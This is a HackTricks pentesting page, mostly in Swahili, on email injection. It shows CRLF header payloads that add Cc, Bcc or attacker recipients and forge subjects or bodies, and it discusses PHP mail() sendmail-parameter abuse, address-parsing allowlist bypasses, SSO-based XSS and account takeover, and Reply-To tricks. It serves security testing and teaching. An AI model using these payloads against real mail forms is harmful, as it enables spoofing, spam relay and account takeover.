hacktricks/pentesting-web/email-injections.md

# Email Injections

<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) kujenga na **kujiendesha** kwa urahisi kazi zinazotolewa na zana za jamii **za kisasa zaidi** duniani.\
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}

{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}

## Inject in sent e-mail

### Inject Cc and Bcc after sender argument
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
Ujumbe utatumwa kwa akaunti za mpokeaji na mpokeaji1.

### Ingiza hoja
```
From:sender@domain.com%0ATo:attacker@domain.com
```
Ujumbe utatumwa kwa mpokeaji wa asili na akaunti ya mshambuliaji.

### Ingiza hoja ya Somo
```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.

### Badilisha mwili wa ujumbe

Inject a two-line feed, then write your message to change the body of the message.
```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
### PHP mail() function exploitation
```bash
# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}
```
#### Kigezo cha 5 ($additional\_parameters)

Sehemu hii itategemea **jinsi ya kutumia kigezo hiki ikiwa mshambuliaji anakiendesha**.

Kigezo hiki kitaongezwa kwenye mstari wa amri PHP itakayotumia kuita binary sendmail. Hata hivyo, kitaondolewa kwa kutumia kazi `escapeshellcmd($additional_parameters)`.

Mshambuliaji anaweza **kuchanganya vigezo vya kutolewa kwa sendmail** katika kesi hii.

#### Tofauti katika utekelezaji wa /usr/sbin/sendmail

**sendmail** kiolesura kinatolewa na **programu ya MTA ya barua pepe** (Sendmail, Postfix, Exim n.k.) iliyosanikishwa kwenye mfumo. Ingawa **utendaji wa msingi** (kama vile vigezo -t -i -f) unabaki **sawa** kwa sababu za ulinganifu, **kazi na vigezo vingine** vinatofautiana sana kulingana na MTA iliyosanikishwa.

Hapa kuna mifano michache ya kurasa tofauti za mtu wa amri ya sendmail:

* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences

Kulingana na **chanzo cha sendmail** binary, chaguzi tofauti zimegunduliwa kutumia vibaya na **kuvuja faili au hata kutekeleza amri zisizo za kawaida**. Angalia jinsi katika [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)

## Changanya katika jina la barua pepe

### Sehemu zilizopuuziliwa mbali za barua pepe

Alama: **+, -** na **{}** katika matukio nadra zinaweza kutumika kwa kuweka alama na kupuuziliwa mbali na seva nyingi za barua pepe

* Mfano: john.doe+intigriti@example.com → john.doe@example.com

**Maoni kati ya mabano ()** mwanzoni au mwishoni pia yatapuuziliwa mbali

* Mfano: john.doe(intigriti)@example.com → john.doe@example.com

### Kupita kwenye orodha ya ruhusa

<figure><img src="../.gitbook/assets/image (812).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>

### Nukuu

<figure><img src="../.gitbook/assets/image (626).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>

### IPs

Unaweza pia kutumia IP kama jina la domain kati ya mabano:

* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]

### Uvunjifu mwingine

![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)

## SSO ya wahusika wengine

### XSS

Huduma zingine kama **github** au **salesforce zinakuruhusu** kuunda **anwani ya barua pepe yenye mzigo wa XSS**. Ikiwa unaweza **kutumia hawa watoa huduma kuingia kwenye huduma nyingine** na huduma hizi **hazifanyi usafi** ipasavyo kwenye barua pepe, unaweza kusababisha **XSS**.

### Kuchukua Akaunti

Ikiwa **huduma ya SSO** inakuruhusu **kuunda akaunti bila kuthibitisha anwani ya barua pepe iliyotolewa** (kama **salesforce**) na kisha unaweza kutumia akaunti hiyo ku **ingia kwenye huduma tofauti** ambayo **inaamini** salesforce, unaweza kufikia akaunti yoyote.\
_Kumbuka kwamba salesforce inaonyesha ikiwa barua pepe iliyotolewa ilithibitishwa au la lakini hivyo programu inapaswa kuzingatia habari hii._

## Reply-To

Unaweza kutuma barua pepe ukitumia _**From: company.com**_ na _**Replay-To: attacker.com**_ na ikiwa **jibu la kiotomatiki** litatumwa kwa sababu barua pepe ilitumwa **kutoka** anwani ya **ndani**, **mshambuliaji** anaweza kuwa na uwezo wa **kupokea** hiyo **jibu**.

## Kiwango cha Hard Bounce

Huduma fulani, kama AWS, zinafanya kazi na kigezo kinachojulikana kama **Kiwango cha Hard Bounce**, ambacho kawaida huwekwa kwenye 10%. Hii ni kipimo muhimu, hasa kwa huduma za utoaji wa barua pepe. Wakati kiwango hiki kinapozidi, huduma, kama huduma ya barua pepe ya AWS, inaweza kusimamishwa au kuzuiwa.

**hard bounce** inahusu **barua pepe** ambayo imerejeshwa kwa mtumaji kwa sababu anwani ya mpokeaji si halali au haipo. Hii inaweza kutokea kwa sababu mbalimbali, kama vile **barua pepe** kutumwa kwa anwani isiyo na ukweli, domain ambayo si halisi, au kukataa kwa seva ya mpokeaji kukubali **barua pepe**.

Katika muktadha wa AWS, ikiwa unatumia barua pepe 1000 na 100 kati yao zinarejea kama hard bounces (kwa sababu kama anwani zisizo halali au domains), hii itamaanisha kiwango cha 10% cha hard bounce. Kufikia au kuzidi kiwango hiki kunaweza kusababisha AWS SES (Huduma ya Barua Pepe Rahisi) kuzuiwa au kusimamishwa uwezo wako wa kutuma barua pepe.

Ni muhimu kudumisha kiwango cha chini cha hard bounce ili kuhakikisha huduma ya barua pepe isiyokatizwa na kudumisha sifa ya mtumaji. Kufuata na kudhibiti ubora wa anwani za barua pepe kwenye orodha zako za barua kunaweza kusaidia sana katika kufikia hili.

Kwa maelezo zaidi, hati rasmi ya AWS kuhusu kushughulikia bounces na malalamiko inaweza kutazamwa [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).

## Marejeleo

* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
* [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)

{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}

<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) kujenga na **kujiendesha** kwa urahisi kazi zinazotolewa na zana za jamii **za kisasa zaidi** duniani.\
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}